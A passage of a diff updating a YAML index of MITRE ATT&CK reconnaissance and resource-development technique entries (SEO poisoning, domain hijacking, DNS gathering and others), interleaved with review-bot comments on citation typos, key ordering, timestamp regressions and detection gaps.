- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
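Review bot: In the paragraph added to the T1608.006 description in this hunk, the citation key `Chexmarx-seo` is misspelled relative to its sibling `Checkmarx-oss-seo`, and `popularity(Citation: Chexmarx-seo)` lacks the space before the parenthesis that every other citation in this description has. The lookup still works because the matching `source_name: Chexmarx-seo` added later in this diff carries the same misspelling, so nothing is functionally broken, but both spellings should be corrected together (upstream, if this text is mirrored from ATT&CK) so the reference does not have to stay misspelled in order to keep resolving.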
@@ -110725,7 +111389,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -110739,7 +111403,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -110772,11 +111436,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -110798,7 +111469,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -110816,47 +111487,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -110865,21 +111499,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
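Review bot: the key reordering in this hunk (x_mitre_domains, x_mitre_platforms, type, id, created, created_by_ref and the whole external_references list all move below kill_chain_phases) turns what is substantively a small change into a 50-line diff. The actual changes are dropping `spec_version: '2.1'`, raising `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0, and adding `x_mitre_deprecated: false` and `revoked: false`; if this index is produced by a generator, pin its key order (or emit keys sorted) so future ATT&CK refreshes show only the fields that really changed. Note that x_mitre_version stays '1.1', which is correct for a metadata-only update.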
@@ -110919,7 +111589,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
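Review bot: `modified` for T1588.005 moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:14:01.255Z', while the object's x_mitre_version is unchanged; a timestamp regression normally means the import was run against a different STIX bundle than the one behind the previous index, not that the object changed. The same '2022-04-25T14:00:00.188Z' value is replaced on many objects in this diff, so confirm which bundle is authoritative before merging, and consider having the generator record the ATT&CK release it was run against in the commit message so regressions like this are explainable later.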
@@ -110938,15 +111608,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
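Review bot: the new clause in the T1584.001 description, "or compromising a cloud service that enables managing domains (e.g., AWS Route53)", is attached to the pre-existing (Citation: Krebs DNS Hijack 2019) marker and no new external reference is added in this hunk; confirm the upstream ATT&CK object cites it the same way rather than a reference having been dropped during import. The `modified` bump to '2024-09-24T15:10:40.270Z' is consistent with a content change, and the `spec_version: '2.1'` removal at the top of the hunk matches the rest of the diff.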
@@ -110954,19 +111622,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -111000,55 +111668,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
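Review bot: this hunk is internally consistent: the new third paragraph on User-Agent header collection cites TrellixQakbot, and the matching external_references entry, the contributor line, `revoked: false`, and the x_mitre_version bump from '1.1' to '1.2' all arrive together. Two things worth flagging for anyone using this entry to build detections: x_mitre_data_sources still lists only 'Internet Scan: Response Content' and the detection text still speaks only of internet scanners, whereas the new paragraph describes a server that serves different content depending on the requesting User-Agent. The defensive consequence is that URL analysis or sandbox detonation should replay requests with the same User-Agent a targeted endpoint would send, otherwise the analyst sees the benign branch. The remaining changes (url lines moved below description, `modified` updated) are ordering noise from the generator.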
@@ -111073,7 +111750,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
@@ -111089,8 +111766,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
@@ -111112,7 +111787,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -111128,8 +111803,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -111157,7 +111830,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -111173,33 +111846,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
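Review bot: two content changes here and both look right: the punctuation fix from "DNS, MX, TXT, and SPF records" to "DNS MX, TXT, and SPF records" (MX, TXT and SPF are DNS record types, so the comma was wrong) and the new paragraph on AXFR zone transfers, with the x_mitre_version bump from '1.1' to '1.2' matching. The three new citation markers (Trails-DNS, DNS-CISA, Alexa-dns) have no entries in this hunk, so make sure the external_references hunk that follows is committed together with it. One thing the unchanged detection text now understates: an AXFR request against the organization's own authoritative name server happens inside the target's visibility, unlike most of this technique, so query logging for AXFR/IXFR requests and restricting zone transfers to the listed secondaries give a concrete detection and mitigation hook for that paragraph.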
@@ -111213,18 +111886,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
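Review bot: the DNS-CISA entry's description dates the alert "(2016, September 29)" but the URL path reads `.../alerts/2015/04/13/...`, so one of the two is wrong; check the alert page and correct whichever field does not match before this propagates into the generated indexes. The Sean Metcalf entry swaps twitter.com for x.com and drops the `/photo/1` suffix, and Trails-DNS points at a web.archive.org snapshot; both are fine, and since tweet availability is not stable the x.com link is a candidate for the same archive treatment. The `x_mitre_attack_spec_version` move from 2.1.0 to 3.2.0 and the `spec_version` removal match the rest of the diff.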
@@ -111245,7 +111929,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
